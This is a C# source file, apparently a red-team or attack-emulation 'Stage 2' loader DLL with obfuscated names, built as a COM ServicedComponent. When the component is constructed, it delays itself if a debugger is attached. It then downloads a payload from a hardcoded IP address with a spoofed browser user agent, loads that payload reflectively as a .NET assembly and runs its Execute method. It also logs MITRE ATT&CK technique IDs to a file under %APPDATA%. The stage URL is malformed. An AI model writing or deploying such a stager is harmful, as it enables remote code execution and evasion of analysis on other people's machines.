using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Net;
using System.Text;
using System.IO;
using System.Threading;

[ComVisible(true)]
[Guid("B3A7F6E1-5D4C-4E3A-9A6B-8C7D6E5F4A3B")]
public class qxwmlp : ServicedComponent
{
    const string fgkjdnv = "10";
    const string zxcvmnb = "http://100.111.22.117:8000";
    const string lkjhgf = "1100";
    const string poiuyt = "https://http://100.111.22.117:8000/stage/1100/3?endpoint_id=10";
    const string mnbvcx = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    const string asdfgh = "%APPDATA%\\1100\\\\Timestamp-Log.txt";
    
    private void dplkxqv(string vbnmkl, int jhgtfr)
    {
        try
        {
            string qazwsx = Environment.ExpandEnvironmentVariables(asdfgh);
            string edcrfv = $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {fgkjdnv}-{lkjhgf}-{vbnmkl}={jhgtfr}";
            File.AppendAllText(qazwsx, edcrfv + Environment.NewLine);
        }
        catch { }
    }
    
    public qxwmlp()
    {
        try
        {
            if (System.Diagnostics.Debugger.IsAttached)
                Thread.Sleep(60000);
                
            byte[] tgbnhy = null;
            
            try
            {
                using (WebClient rfvtgb = new WebClient())
                {
                    rfvtgb.Headers[HttpRequestHeader.UserAgent] = mnbvcx;
                    rfvtgb.Proxy = null;
                    
                    string ujmiko = $"{zxcvmnb}{poiuyt}";
                    tgbnhy = rfvtgb.DownloadData(ujmiko);
                    dplkxqv("T1105", 1);
                }
            }
            catch
            {
                dplkxqv("T1105", 0);
                return;
            }
            
            if (tgbnhy != null && tgbnhy.Length > 0)
            {
                try
                {
                    Assembly yhnujm = Assembly.Load(tgbnhy);
                    object plmokn = yhnujm.CreateInstance("EntryPoint");
                    
                    if (plmokn != null)
                    {
                        MethodInfo ikmjun = plmokn.GetType().GetMethod("Execute");
                        if (ikmjun != null)
                        {
                            ikmjun.Invoke(plmokn, null);
                            dplkxqv("T1620", 1);
                        }
                        else
                        {
                            dplkxqv("T1620", 0);
                        }
                    }
                    else
                    {
                        dplkxqv("T1620", 0);
                    }
                }
                catch
                {
                    dplkxqv("T1620", 0);
                }
            }
        }
        catch { }
    }
    
    [ComUnregisterFunction]
    public static void wscxdr(Type t)
    {
    }
}